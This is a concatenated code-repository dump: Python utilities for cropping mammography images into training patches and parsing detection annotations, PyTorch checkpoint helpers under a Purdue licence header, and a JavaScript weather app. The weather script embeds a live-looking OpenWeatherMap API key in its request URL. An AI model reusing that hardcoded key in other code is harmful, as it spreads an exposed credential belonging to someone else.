(isinstance(image_search_path, (list, tuple)) and len(image_search_path) > 1)
or (isinstance(mask_search_path, (list, tuple)) and len(mask_search_path) > 1)
)
@staticmethod
def _find_data_files(search_path_list, suffix):
if not isinstance(search_path_list, (list, tuple)):
search_path_list = [search_path_list]
image_files_list = []
for single_image_search_path in search_path_list:
tmp_image_files = PairedDictGenerator._find_data_files(single_image_search_path, suffix)
image_files_list.append(tmp_image_files) # list of list
assert len(set(len(image_files) for image_files in image_files_list)) <= 1, \
'Different folders have different number of files for list {}'.format(search_path_list)
# flatten list of list
image_files = [item for image_files in image_files_list for item in image_files]
return image_files
def get_paired_image_and_mask(self, join='inner'):
"""Create paired image and mask files
Find common files in two folders and create dictionary paired_dict. Each key has two keys:
'image': path to the image file
'mask': path to the mask file
Args:
join: {'inner', 'outer', 'left', 'right'}
'inner': find intersection between two lists
'outer': find union of two lists
'left': first list (image list)
'right': second list (mask list)
Returns:
paired_dict: paired_dict[key]['image'] and paired_dict[key]['mask'] is a list
"""
# each key in image_dict and mask_dict corresponds to a list
if not self.is_vector:
self.image_dict = {self.get_image_key_fn(filepath): filepath for filepath in self.image_files}
self.mask_dict = {self.get_mask_key_fn(filepath): filepath for filepath in self.mask_files}
else:
self.image_dict = {}
for filepath in self.image_files:
key = self.get_image_key_fn(filepath)
if key not in self.image_dict:
self.image_dict[key] = []
self.image_dict[key].append(filepath)
self.mask_dict = {}
for filepath in self.mask_files:
key = self.get_mask_key_fn(filepath)
if key not in self.mask_dict:
self.mask_dict[key] = []
self.mask_dict[key].append(filepath)
if join == 'inner':
keys = set(self.image_dict.keys()) & set(self.mask_dict.keys())
elif join == 'outer':
keys = set(self.image_dict.keys()) | set(self.mask_dict.keys())
elif join == 'left':
keys = set(self.image_dict.keys())
elif join == 'right':
keys = set(self.mask_dict.keys())
else:
raise KeyError('Unsupported join method {}'.format(join))
if self.is_vector:
empty_val = []
else:
empty_val = ''
paired_dict = {}
for key in keys:
paired_dict[key] = {}
paired_dict[key]['image'] = self.image_dict.get(key, empty_val)
paired_dict[key]['mask'] = self.mask_dict.get(key, empty_val)
logging.debug('paired_dict with length {}'.format(len(paired_dict)))
filepath = os.path.join(self.output_dir, 'paired_dict.json')
fileio.maybe_make_new_dir(os.path.dirname(filepath))
with open(filepath, 'w') as f_out:
json.dump(paired_dict, f_out, indent=4, sort_keys=True)
return paired_dict
class PatchConverter(PairedDictGenerator):
"""Convert images to patches in the same folder
Note: All coordinates are in (y, x) or (h, w) order.
Args:
image_search_path: a glob search pattern to find all images and labels
mask_search_path:
output_dir:
block_size: patch size. If (-1, -1), return the whole image
overlap:
image_suffix:
mask_suffix:
remove_zero_threshold: applied to LABEL patch. The number of non-zero pixels
below which to discard the label patch. If -1 do not discard any label patch.
remove_fg_threshold: applied to IMAGE patch. Default to 0.5. Discard patches
if 50% of image patch is background
"""
def __init__(self, image_search_path, mask_search_path, output_dir,
block_size=(100, 100), overlap=(0, 0),
image_suffix=".tif", mask_suffix='_mask.tif',
remove_zero_threshold=-1, ignore_padding=0, remove_fg_threshold=0.5, scale=1.0):
super(PatchConverter, self).__init__(image_search_path, mask_search_path, output_dir,
image_suffix=image_suffix, mask_suffix=mask_suffix)
# NB. update block_size, overlap, central_size and padding_size together
self.block_size = block_size
self.overlap = overlap
self.central_size = np.array(self.block_size) - np.array(self.overlap)
assert np.all(item % 2 == 0 for item in self.overlap), 'overlap must be even integers!'
# padding_size used to compensate for prediction center cropping
self.padding_size = (overlap[0] // 2, overlap[1] // 2)
# Temp folder to store cropped patches. Use timestamp to avoid racing condition
time_now = datetime.now()
time_string = time_now.strftime("%Y%m%d-%Hh%M%p%S")
self.prediction_patch_dir = '/tmp/tmp_patches_' + time_string
self.remove_zero_threshold = remove_zero_threshold
self.ignore_padding = ignore_padding
fileio.maybe_make_new_dir(self.output_dir)
self.remove_fg_threshold = remove_fg_threshold
self.scale = scale
def crop_patches(self, image_array, top_left=(0, 0), padding='zero'):
"""
Args:
image_array: a numpy array containing the image
top_left: a tuple containing the (y, x) coordinate of the patch
the patch will have shape (h, w) = self.block_size
padding: if patch is partially outside of image, use padding
'zero': padding with zero
'mirror': mirror padding
Returns: a numpy array of the patch of from image_array
"""
height, width = image_array.shape
y, x = top_left
h_patch, w_patch = self.block_size
# TODO: move padding to self._preprocess_image()
y_padding, x_padding = self.padding_size
image_array_padded = np.zeros((height + 2 * y_padding, width + 2 * x_padding))
image_array_padded[y_padding:(y_padding + height), x_padding:(x_padding + width)] = image_array
y += y_padding
x += x_padding
patch_array = image_array_padded[y:(y + h_patch), x:(x + w_patch)]
# pad patch_array to block_size if patch array is partial
patch_array = augmentation.crop_or_pad(patch_array, self.block_size)
assert patch_array.shape == tuple(self.block_size), 'patch_array shape {}'.format(patch_array.shape)
return patch_array
def generate_top_left_list(self, image_shape, method='valid'):
"""Generate a list of coordinates of the top left corner point
Args:
image_shape:
method: can be 'valid' or 'padding'
'valid': adjust end block so that it does not extend beyond valid image
'padding': pad partial patches with zeroes
state:
'train': during training, crop from the original image
'predict': during prediction, crop from padded image to generate the whole image mask
Returns:
top_left_list: a list of (y, x) tuples
"""
height, width = image_shape
h_block, w_block = self.block_size
h_overlap, w_overlap = self.overlap
h_padding, w_padding = self.padding_size
# generate block increments
dy = h_block - h_overlap
dx = w_block - w_overlap
assert dy > 0 and dx > 0, "overlap larger than block size!"
# crop from padded image
# from (-h_padding, -w_padding) to (height + h_padding, width + w_padding)
y_list = list(range(-h_padding, height + h_padding - h_overlap, dy))
x_list = list(range(-w_padding, width + w_padding - w_overlap, dx))
logging.debug('x_list before adjustment: {}'.format(x_list))
logging.debug('y_list before adjustment: {}'.format(y_list))
if method == 'valid':
y_list[-1] = height + h_padding - h_block
x_list[-1] = width + w_padding - w_block
elif method == 'padding':
# padding implemented in self.crop_patches()
pass
top_left_list = [(y, x) for y in y_list for x in x_list]
logging.debug('image total size {} x {}'.format(height, width))
logging.debug('x_list: {}'.format(x_list))
logging.debug('y_list: {}'.format(y_list))
return top_left_list
@staticmethod
def _get_patch_name(key, idx, name='', is_mask=False, output_dir=None):
if not is_mask:
file_name = '{}_{:03d}{}.png'.format(key, idx, name)
else:
file_name = '{}_{:03d}{}_mask.png'.format(key, idx, name)
file_path = os.path.join(output_dir, file_name)
return file_path
def save_patch_to_file(self, image_array, key, idx, name='', is_mask=False, output_dir=None):
"""Save image patches to self.output_dir
Args:
image_array:
key:
idx: the index number of pathces corresponding to the same key
is_mask: boolean to indicate if the patch is image or mask
Returns:
None
"""
output_dir = output_dir or self.output_dir # if output_dir is None, use self.output_dir
file_path = self._get_patch_name(key, idx, name=name, is_mask=is_mask, output_dir=output_dir)
cv2.imwrite(file_path, image_array)
def batch_convert_patches(self, n_batch=None, method='valid'):
"""Convert image to patches
Args:
n_batch: number of images to convert
Returns:
None
"""
paired_dict = self.get_paired_image_and_mask()
keys = sorted(paired_dict.keys())
if n_batch is not None:
keys = keys[:n_batch]
for key in tqdm(keys):
logging.info('Cropping {}'.format(paired_dict[key]['image']))
image_array = fileio.load_image_to_array(paired_dict[key]['image'])
if len(image_array.shape)>2:
image_array = image_array[:,:,1]
image_array = self._preprocess_image(image_array)
logging.info('Cropping {}'.format(paired_dict[key]['mask']))
mask_array = fileio.load_image_to_array(paired_dict[key]['mask'])
mask_array = self._preprocess_mask(mask_array, image_array.shape)
top_left_list = self.generate_top_left_list(image_array.shape, method=method)
idx = 0
idx_neg = 0
for top_left in top_left_list:
y, x = top_left
name = '_y{}_x{}'.format(y, x) # add name to indicate original position of the patch
patch_array = self.crop_patches(mask_array, top_left)
if self.ignore_padding > 0:
central_patch_array = patch_array[self.ignore_padding:-self.ignore_padding,
self.ignore_padding:-self.ignore_padding]
else:
central_patch_array = patch_array
if central_patch_array.astype(np.bool).sum() >= self.remove_zero_threshold:
self.save_patch_to_file(patch_array, key, idx, name=name, is_mask=True)
patch_array = self.crop_patches(image_array, top_left)
self.save_patch_to_file(patch_array, key, idx, name=name, is_mask=False)
idx += 1
else:
# negative patches, also save to file in a different directory if image contains more than half
# FG. Otherwise discard.
patch_array = self.crop_patches(image_array, top_left)
if patch_array.astype(np.bool).sum() >= patch_array.size * self.remove_fg_threshold:
name = name + '_neg'
patch_array = self.crop_patches(mask_array, top_left)
self.save_patch_to_file(patch_array, key, idx_neg, name=name, is_mask=True)
patch_array = self.crop_patches(image_array, top_left)
self.save_patch_to_file(patch_array, key, idx_neg, name=name, is_mask=False)
idx_neg += 1
def _preprocess_image(self, image_array, interpolation=cv2.INTER_AREA):
"""Image level preprocessing. Reimplement base class dummy method"""
image_array = augmentation.resize(image_array, dst_shape=(0, 0), scale=self.scale, interpolation=interpolation)
# image_array = augmentation.pad(image_array, padding=(self.padding_size))
return image_array
def _preprocess_mask(self, mask_array, target_shape=None, interpolation=cv2.INTER_AREA):
"""Image level preprocessing. Reimplement this to add preprocessing"""
if target_shape and mask_array != target_shape:
# dsize in the order of (x, y)
mask_array = augmentation.resize(mask_array, dst_shape=target_shape[::-1], interpolation=interpolation)
logging.debug('mask shape {}'.format(mask_array.shape))
return mask_array
def split_train_and_test(self, valid_size=0.2, test_size=0.1, random_state=42,
valid_txt_path=None, train_txt_path=None,
dry_run=True):
"""Split the output files in output_dir into train, valid and test dir
Split ratio
train : valid : test = (1 - valid_size - test_size) : valid_size : test_size
Note: If both valid_txt_path and train_txt_path are verified, use these txt to split patches. In this case,
there is no test set.
Args:
valid_size: ratio of valid/all to split data
test_size: ratio of test/train to split data
dry_run: if True, do not move files
Returns:
None
"""
mask_files = self._find_data_files(os.path.join(self.output_dir, '*png'), suffix='_mask.png')
image_files = [file_path.replace('_mask', '') for file_path in mask_files]
def _move_files(files_list, subdir='train'):
for file_path in files_list:
new_dir = os.path.join(os.path.dirname(file_path), subdir)
fileio.maybe_make_new_dir(new_dir)
new_path = os.path.join(new_dir, os.path.basename(file_path))
if dry_run:
logging.debug('move {} to {}'.format(file_path, new_path))
else:
shutil.move(file_path, new_path)
image_files_valid = []
image_files_train = []
image_files_test = []
mask_files_valid = []
mask_files_train = []
mask_files_test = []
if valid_txt_path and train_txt_path:
valid_keys = [self.get_image_key_fn(filepath) for filepath in fileio.read_list_from_txt(valid_txt_path)]
train_keys = [self.get_image_key_fn(filepath) for filepath in fileio.read_list_from_txt(train_txt_path)]
for image_file, mask_file in zip(image_files, mask_files):
if self.get_image_key_fn(image_file) in valid_keys:
image_files_valid.append(image_file)
mask_files_valid.append(mask_file)
elif self.get_image_key_fn(image_file) in train_keys:
image_files_train.append(image_file)
mask_files_train.append(mask_file)
else:
raise ValueError('valid_txt_path and train_txt_path is not collectively exhaustive!')
else:
image_files_train, image_files_test, mask_files_train, mask_files_test = \
train_test_split(image_files, mask_files,
test_size=test_size + valid_size,
random_state=random_state)
image_files_valid, image_files_test, mask_files_valid, mask_files_test = \
train_test_split(image_files_test, mask_files_test,
test_size=test_size / (test_size + valid_size),
random_state=random_state)
logging.debug(len(image_files_train))
logging.debug(len(image_files_valid))
logging.debug(len(image_files_test))
_move_files(image_files_train, subdir='train')
_move_files(mask_files_train, subdir='train')
_move_files(image_files_valid, subdir='valid')
_move_files(mask_files_valid, subdir='valid')
_move_files(image_files_test, subdir='test')
class ToyPatchConverter(PatchConverter):
"""Toy model for sanity check"""
def __init__(self):
image_search_path = r'/data/log/mammo/toy/random_image.png*'
mask_search_path = r'/data/log/mammo/toy/random_mask.png*'
output_dir = r'/data/log/mammo/toy/random/'
super().__init__(image_search_path, mask_search_path, output_dir,
block_size=(512, 512), overlap=(256, 256),
image_suffix='.png', mask_suffix='.png',
remove_zero_threshold=100)
def deploy(self):
self.batch_convert_patches()
class MassOrCalcPatchConverter(PatchConverter):
def __init__(self, image_search_path, mask_search_path, output_dir, valid_txt_path=None, train_txt_path=None,
dataset='inbreast', scale=0.25, ignore_padding=0, remove_zero_threshold=0, remove_fg_threshold=0.5,
crop_method='valid', whole_image=False):
if whole_image:
# override parameters for whole image
remove_zero_threshold = 0
remove_fg_threshold = 0
crop_method = 'padding'
super().__init__(image_search_path, mask_search_path, output_dir,
block_size=(512, 512), overlap=(256, 256),
image_suffix='.png', mask_suffix='.png',
scale=scale,
ignore_padding=ignore_padding,
remove_zero_threshold=remove_zero_threshold,
remove_fg_threshold=remove_fg_threshold)
self.valid_txt_path = valid_txt_path
self.train_txt_path = train_txt_path
self.dataset = dataset
self.crop_method = crop_method
def get_image_key_fn(self, filepath):
if self.dataset in ['ddsm']:
return os.path.basename(filepath).split('.')[0]
elif self.dataset in ['china', 'inbreast']:
return os.path.basename(filepath).split('.')[0].split('_')[0]
def get_mask_key_fn(self, filepath):
if self.dataset in ['ddsm']:
return os.path.basename(filepath).split('_mask')[0]
elif self.dataset in ['china', 'inbreast']:
return os.path.basename(filepath).split('.')[0].split('_')[0]
def deploy(self):
self.batch_convert_patches(method=self.crop_method)
self.split_train_and_test(test_size=0.1, valid_size=0.2, dry_run=False,
valid_txt_path=self.valid_txt_path,
train_txt_path=self.train_txt_path)
if __name__ == '__main__':
print('so far so good')
import doctest
doctest.testmod()
# set up flags
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('task', '', 'mass or calc training')
tf.app.flags.DEFINE_string('dataset', 'inbreast', 'inbreast or ddsm or china for mass training')
tf.app.flags.DEFINE_boolean('ignore_single_point', True, 'Whether to ignore single point annotation for calc')
tf.app.flags.DEFINE_boolean('whole_image', False, 'Whether to crop whole image')
tf.app.flags.DEFINE_float('scale', 0.25, 'Ratio to scale down original image before cropping patches')
logging.getLogger().setLevel(logging.INFO)
logging.debug(FLAGS.task)
## patch conversion
if FLAGS.task == 'calc_crop':
image_search_path = r'/data1/Image_data/Mammography_data/INbreast/AllPNG_norm_6_6/*png'
if FLAGS.ignore_single_point:
mask_search_path = r'/data1/Image_data/Mammography_data/INbreast/calc_mask_ignore_single_point/*png'
else:
mask_search_path = r'/data1/Image_data/Mammography_data/INbreast/calc_mask/*png'
valid_txt_path = r'/data1/Image_data/Mammography_data/INbreast/valid.txt'
train_txt_path = r'/data1/Image_data/Mammography_data/INbreast/train.txt'
output_dir = '/data1/Image_data/Mammography_data/log/calc_patches'
MassOrCalcPatchConverter(image_search_path, mask_search_path, output_dir,
valid_txt_path=valid_txt_path,
train_txt_path=train_txt_path,
scale=1.0,
ignore_padding=0,
remove_zero_threshold=25).deploy()
# for a smaller size datasize.
if FLAGS.task == 'calc_crop_synth':
image_search_path = r'/data1/Image_data/Mammography_data/INbreast/Calc_synthesis/20190711/synthesis_image/*png'
if FLAGS.ignore_single_point:
mask_search_path = r'/data1/Image_data/Mammography_data/INbreast/Calc_synthesis/20190711/synthesis_mask/*png'
else:
mask_search_path = r'/data1/Image_data/Mammography_data/INbreast/calc_mask/*png'
valid_txt_path = r'/data1/Image_data/Mammography_data/INbreast/Calc_synthesis/20190711/valid.txt'
train_txt_path = r'/data1/Image_data/Mammography_data/INbreast/Calc_synthesis/20190711/train.txt'
output_dir = '/data1/Image_data/Mammography_data/INbreast/Calc_synthesis/20190711/calc_patches/'
fileio.maybe_make_new_dir(output_dir)
MassOrCalcPatchConverter(image_search_path, mask_search_path, output_dir,
valid_txt_path=valid_txt_path,
train_txt_path=train_txt_path,
scale=1.0,
ignore_padding=0,
remove_zero_threshold=25).deploy()
if FLAGS.task == 'calc_cluster_crop':
image_search_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/calc_cluster/png/*png'
mask_search_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/calc_cluster/bootstrap_mask_cleaned/*png'
valid_txt_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/evaluation/valid.txt'
train_txt_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/evaluation/train.txt'
output_dir = '/data/log/mammo/calc_cluster_patches'
# output_dir = '/data/log/mammo/calc_cluster_crop_affine_pos'
MassOrCalcPatchConverter(image_search_path, mask_search_path, output_dir,
valid_txt_path=valid_txt_path,
train_txt_path=train_txt_path,
scale=1.0,
ignore_padding=0,
remove_zero_threshold=25).deploy()
elif FLAGS.task == 'mass_crop':
if FLAGS.dataset == 'inbreast':
image_search_path = r'/media/Data/Data02/Datasets/Mammogram/INbreast/AllPNG_norm_6_6/*png'
mask_search_path = r'/media/Data/Data02/Datasets/Mammogram/INbreast/mass_mask/*png'
valid_txt_path = r'/media/Data/Data02/Datasets/Mammogram/INbreast/valid.txt'
train_txt_path = r'/media/Data/Data02/Datasets/Mammogram/INbreast/train.txt'
elif FLAGS.dataset == 'ddsm':
image_search_path = r'/media/Data/Data02/Datasets/Mammogram/CBIS_DDSM/mass_mask/image_norm_6_6/*png'
mask_search_path = r'/media/Data/Data02/Datasets/Mammogram/CBIS_DDSM/mass_mask/*png'
valid_txt_path = None
train_txt_path = None
elif FLAGS.dataset == 'china':
image_search_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/AllPNG_norm_6_6/*png'
mask_search_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/mass_mask_etc/*png'
valid_txt_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/valid.txt'
train_txt_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/train.txt'
else:
raise ValueError('Unsupported dataset {}'.format(FLAGS.mass_dataset))
output_dir = '/data/log/mammo/mass_patches_area'
MassOrCalcPatchConverter(image_search_path, mask_search_path, output_dir,
valid_txt_path=valid_txt_path,
train_txt_path=train_txt_path,
scale=FLAGS.scale,
dataset=FLAGS.dataset,
whole_image=FLAGS.whole_image,
ignore_padding=128,
remove_zero_threshold=100).deploy()
else:
raise ValueError('Unknown task: {}'.format(FLAGS.task))
<file_sep>"""
This file contains common utility functions for object detection
"""
import json
import glob2
import numpy as np
import os
import pandas as pd
import xmltodict
from projects.drutils import data
from projects.drutils import fileio
from projects.mammo_seg.dataset import ddsm
def write_result_dict(result_dict,
output_filepath,
is_append=True):
"""Write result_dict to text file
result_dict has the following keys:
key:
detection_boxes:
detection_scores:
detection_classes:
Args:
result_dict:
output_filepath:
is_append: if True, append to existing file
Returns:
None
"""
result_dict_copy = dict(result_dict)
result_dict_copy.pop('original_image') # original image is extremely space consuming in text format
for key, val in result_dict_copy.items():
if type(val) is np.ndarray:
result_dict_copy[key] = result_dict_copy[key].tolist()
if isinstance(val, bytes):
result_dict_copy[key] = result_dict_copy[key].decode('utf-8')
open_mode = 'a' if is_append else 'w'
with open(output_filepath, open_mode) as f_out:
json.dump(result_dict_copy, f_out, sort_keys=True, indent=4, separators=(',', ': '))
def get_result_dict_list_from_txt(result_dict_list_path):
"""Get a list of json objects from a file path
Each json object (dictionary) from a text file. Each dictionary is
evaluated from tensor_dict defined in ``
Args:
result_dict_list_path: path to a txt containing multiple json objects
Returns:
result_dict_list: a list of dictionaries
"""
with open(result_dict_list_path, 'r') as f_in:
text = f_in.read()
# use `}{` to break multiple json objects
# TODO: Add more robust parsing mechanism to detect if there is multiple json in the same txt
text = text.replace('}{', '}###{')
json_text_list = text.split('###')
result_dict_list = []
for json_text in json_text_list:
result_dict = json.loads(json_text)
for key, val in result_dict.items():
if isinstance(val, list):
result_dict[key] = np.array(val)
result_dict_list.append(result_dict)
return result_dict_list
def get_bbox_list_from_xml_file(xml_path, is_rescale=False, min_dimension=-1, max_dimension=-1, class_name='pathology'):
"""Get list of bbox coordinates given a path of an xml file
All coordinates are in the order of (ymin, xmin, ymax, xmax), following the convention in `tf_example_decoder.py`
Args:
xml_path: the path to the xml annotation file
is_rescale: flag indicating whether to do rescale or not
min_dimension:
max_dimension:
Returns:
bbox_list: numpy array of coordinates
class_list: list of bbox classes
"""
if not xml_path:
print('xml path not found {}'.format(xml_path))
return [], []
with open(xml_path, 'r') as f_in:
doc = xmltodict.parse(f_in.read())
# print(json.dumps(doc, sort_keys=True,
# indent=4, separators=(',', ': ')))
if is_rescale:
if min_dimension == -1 and max_dimension == -1:
raise ValueError('min_dimension and max_dimension cannot both be -1 when is_rescale is True')
width = float(doc['annotation']['size']['width'])
height = float(doc['annotation']['size']['height'])
# TODO: add option to use partial dimensions
width_new, height_new = data.get_new_dimensions((width, height), min_dimension, max_dimension)
rescale_factor = width_new / width
else:
rescale_factor = 1
bbox_list = []
obj_list = doc['annotation']['object']
# 'object' may be a list of jsons
if not isinstance(obj_list, list):
obj_list = [obj_list]
for obj in obj_list:
bbox_coord = []
for key in ['ymin', 'xmin', 'ymax', 'xmax']:
bbox_coord.append(float(obj['bndbox'][key]) * rescale_factor)
bbox_list.append(bbox_coord)
bbox_list = np.array(bbox_list)
# print(bbox_list)
# TODO: get everything from csv
barename = os.path.basename(xml_path)
barename = os.path.splitext(barename)[0]
df = pd.read_csv(ddsm.generate_ddsm_dict()['csv_path'])
rows = df[df['filename'].str.contains(barename)]
class_list = rows[class_name].tolist()
print(class_list)
return bbox_list, class_list
def get_xml_file_path_from_image_name(image_name, xml_dir_or_txt):
"""Retrieve xml filepath from xml dir
Args:
image_name:
xml_dir_or_txt:
Returns:
xml_path:
"""
if os.path.isfile(xml_dir_or_txt):
filepaths = fileio.read_list_from_txt(xml_dir_or_txt, field=-1)
elif os.path.isdir(xml_dir_or_txt):
filepaths = list(glob2.glob(os.path.join(xml_dir_or_txt, '**', '*xml')))
else:
raise ValueError('xml_dir_or_txt is neither a directory nor file')
image_name_no_ext = os.path.splitext(os.path.basename(image_name))[0]
xml_path_list = []
for filepath in filepaths:
if image_name_no_ext in filepath:
xml_path_list.append(filepath)
# print(filepath)
assert len(xml_path_list) <= 1, 'xml_path_list expect 0 or 1 element but found {}!'.format(len(xml_path_list))
if len(xml_path_list) == 1:
xml_path = xml_path_list[0]
else:
xml_path = None
return xml_path
<file_sep>__copyright__ = \
"""
Copyright ©right © (c) 2019 The Board of Trustees of Purdue University and the Purdue Research Foundation.
All rights reserved.
This software is covered by US patents and copyright.
This source code is to be used for academic research purposes only, and no commercial use is allowed.
For any questions, please contact <NAME> (<EMAIL>) at Purdue University.
Last Modified: 03/03/2019
"""
__license__ = "CC BY-NC-SA 4.0"
__authors__ = "<NAME>, <NAME>, <NAME>, <NAME>"
__version__ = "1.5.1"
import h5py
import torch
import shutil
def save_net(fname, net):
with h5py.File(fname, 'w') as h5f:
for k, v in net.state_dict().items():
h5f.create_dataset(k, data=v.cpu().numpy())
def load_net(fname, net):
with h5py.File(fname, 'r') as h5f:
for k, v in net.state_dict().items():
param = torch.from_numpy(np.asarray(h5f[k]))
v.copy_(param)
def save_checkpoint(state, is_best,task_id, filename='checkpoint.pth.tar'):
torch.save(state, task_id+filename)
if is_best:
shutil.copyfile(task_id+filename, task_id+'model_best.pth.tar')
"""
Copyright ©right © (c) 2019 The Board of Trustees of Purdue University and the Purdue Research Foundation.
All rights reserved.
This software is covered by US patents and copyright.
This source code is to be used for academic research purposes only, and no commercial use is allowed.
For any questions, please contact <NAME> (<EMAIL>) at Purdue University.
Last Modified: 03/03/2019
"""
|
5b2302a600e12c1b553e1d11a93f01883fec2065
|
[
"Markdown",
"Python"
] | 37
|
Python
|
lvxingvir/template
|
089f5817e031a7c2b2d82e239158a6a5488b3b26
|
2835ad4762dafca4b1b705b59dc3b4301afcba9e
|
refs/heads/master
|
<file_sep>let city = sessionStorage.getItem("cityInSearchBar");
let tempType = 'metric';
let degree = '\°'
let tempLetter = 'C';
let loadCount = sessionStorage.getItem("loadCount") || 0;
if(tempType == 'imperial') {
templetter = 'F';
}
$.getJSON(`https://cors-anywhere.herokuapp.com/http://api.openweathermap.org/data/2.5/weather?q=${city}&APPID=c08f28491a3a2bbb6672e149c1e6342e&units=${tempType}`).done(callBack).fail(jsonFail);
let pictures = [
{
type: "Clear",
timeOfDay: "night",
creator: "<NAME>",
url: "Photos/clearNight.jpg",
website: "https://pixabay.com/photos/british-columbia-canada-clear-lake-2382640/",
host: "Pixabay"
},
{
type: "Clear",
timeOfDay: "day",
creator: "Pixabay",
url: "Photos/clearDay.jpg",
website: 'https://www.pexels.com/photo/skyscrapers-in-city-against-clear-sky-316137/',
host: "Pexels"
},
{
type: "Clouds",
timeOfDay: "night",
creator: "<NAME>",
url: "Photos/cloudsNight.jpg",
website: "https://unsplash.com/photos/Ta9_HNeuQkU",
host: "Unsplash"
},
{
type: "Clouds",
timeOfDay: "day",
creator: "<NAME>",
url: "Photos/cloudsDay.jpg",
website: "https://www.pexels.com/photo/aerial-architecture-blue-sky-buildings-466685/",
host: "Pexels"
},
{
type: "Thunderstorm",
timeOfDay: "night",
creator: "<NAME>",
url: "Photos/thunderstorm.jpg",
website: "https://www.pexels.com/photo/lightning-and-gray-clouds-1162251/",
host: "Pexels"
},
{
type: "Thunderstorm",
timeOfDay: "day",
creator: "skeeze",
url: "Photos/lightningDay.jpg",
website: "https://pixabay.com/photos/lightning-strike-bolt-electricity-2617904/",
host: "Pixabay"
},
{
type: "Drizzle",
timeOfDay: "night",
creator: "<NAME>",
url: "Photos/drizzle.jpg",
website: "https://www.pexels.com/photo/woman-walking-in-the-street-during-night-time-1134166/",
host: "Pexels"
},
{
type: "Drizzle",
timeOfDay: "day",
creator: "<NAME>",
url: "Photos/drizzleDay.jpg",
website: "https://www.pexels.com/photo/raining-in-the-city-2448749/",
host: "Pexels"
},
{
type: "Rain",
timeOfDay: "night",
creator: "<NAME>",
url: "Photos/rainNight.jpg",
website: "https://unsplash.com/photos/GXEZuWo5m4I",
host: "Unsplash"
},
{
type: "Rain",
timeOfDay: "day",
creator: "<NAME>",
url: "Photos/rainDay.jpg",
website: "https://www.pexels.com/photo/person-riding-a-bicycle-during-rainy-day-763398/",
host: "Pexels"
},
{
type: "Snow",
timeOfDay: "night",
creator: "<NAME>",
url: "Photos/snowNight.jpg",
website: "https://www.pexels.com/photo/rain-of-snow-in-town-painting-730256/",
host: "Pexels"
},
{
type: "Snow",
timeOfDay: "day",
creator: "<NAME>",
url: "Photos/snowDay.jpg",
website: "https://unsplash.com/photos/kVKz9qnJC-k",
host: "Unsplash"
},
{
type: "Mist",
timeOfDay: "any",
creator: "<NAME>",
url: "Photos/mist.jpg",
website: "https://www.pexels.com/photo/aerial-photography-of-city-buildings-under-cloudy-sky-2310885/",
host: "Pexels"
},
{
type: "Smoke",
timeOfDay: "any",
creator: "<NAME>",
url: "Photos/smoke.jpg",
website: "https://unsplash.com/photos/Pia51dSIwd0",
host: "Unsplash"
},
{
type: "Haze",
timeOfDay: "any",
creator: "Ishan @seefromthesky",
url: "Photos/haze.jpg",
website: "https://unsplash.com/photos/6U-sSfBV-gM",
host: "Unsplash"
},
{
type: "Dust",
timeOfDay: "any",
creator: "carloyuen",
url: "Photos/dust.jpg",
website: "https://pixabay.com/photos/skyscraper-dust-fog-foggy-2517650/",
host: "Pixabay"
},
{
type: "Ash",
timeOfDay: "any",
creator: "<NAME>",
url: "Photos/ash.jpg",
website: "https://unsplash.com/photos/KRttQCXUjNI",
host: "Unsplash"
},
{
type: "Squall",
timeOfDay: "any",
creator: "SturmjaegerTobi",
url: "Photos/squall.jpg",
website: "https://pixabay.com/photos/sky-squall-line-storm-thunderstorm-3176547/",
host: "Pixabay"
},
{
type: "Tornado",
timeOfDay: "any",
creator: "<NAME>",
url: "Photos/tornado.jpg",
website: "https://unsplash.com/photos/LYq7W1lRal4",
host: "Unsplash"
}
];
function callBack(data) {
console.log(data);
console.log(data.name);
console.log(Math.round(data.main.temp));
console.log(data.weather[0].main);
let pic = pictures.find(x => (x.type == data.weather[0].main) && (x.timeOfDay == "any" || x.timeOfDay == getTime(data.timezone)));
console.log(data.sys.country);
document.getElementById('city').innerHTML = data.name;
document.getElementById('temp').innerHTML = Math.round(data.main.temp) + degree + tempLetter;
document.getElementById('weather').innerHTML = data.weather[0].main;
document.getElementById('creator').innerHTML = `Photo by ${pic.creator} from ${pic.host}`;
document.getElementById('site').href = pic.website;
document.getElementsByTagName('body')[0].style = `background-image: url(${pic.url});
background: linear-gradient(
rgba(54, 53, 53, 0.5),
rgba(49, 48, 48, 0.5)),
url(${pic.url});
background-size: 1920px 1080px;`;
}
function jsonFail(){
if(sessionStorage.getItem("cityInSearchBar") == null && loadCount == 0){
document.getElementById('city').innerHTML = "Welcome to Minimalist Weather!"
document.getElementById('temp').innerHTML = "Type in the search bar to get the weather of the city you desire!";
document.getElementById('creator').innerHTML = `Photo by ${pictures[1].creator} from ${pictures[1].host}`;
document.getElementById('site').href = pictures[1].website;
document.getElementsByTagName('body')[0].style = `background-image: url(${pictures[1].url});
background: linear-gradient(
rgba(54, 53, 53, 0.5),
rgba(49, 48, 48, 0.5)),
url(${pictures[1].url});
background-size: 1920px 1080px;`;
}
else {
document.getElementById('city').innerHTML = "City not found";
document.getElementById('temp').innerHTML = "Please search again";
}
}
function toMetric() {
let t = document.getElementById('temp').innerHTML;
t = t.substring(0, t.length - 2);
if(tempType == 'imperial') {
tempLetter = 'C';
document.getElementById('temp').innerHTML = Math.round((t - 32) * (5/9)) + degree + tempLetter;
tempType = "metric";
}
}
function toImperial() {
let t = document.getElementById('temp').innerHTML;
t = t.substring(0, t.length - 2);
if(tempType == 'metric') {
tempLetter = 'F';
document.getElementById('temp').innerHTML = Math.round((t * (9/5)) + 32) + degree + tempLetter;
tempType = "imperial";
}
}
let enter = document.getElementById('search-bar');
if(enter) {
enter.addEventListener("keyup",function(event){
if(event.keyCode === 13) {
event.preventDefault();
document.getElementById('search-btn').click();
}
});
};
function actSearch() {
city = document.getElementById('search-bar').value;
sessionStorage.setItem("cityInSearchBar", city);
loadCount++;
sessionStorage.setItem("loadCount", loadCount);
window.location.reload();
}
function getTime(seconds){
let n = new Date();
let hours = seconds/3600;
if(n.getUTCHours() + hours >= 6 && n.getUTCHours() + hours <= 18) {
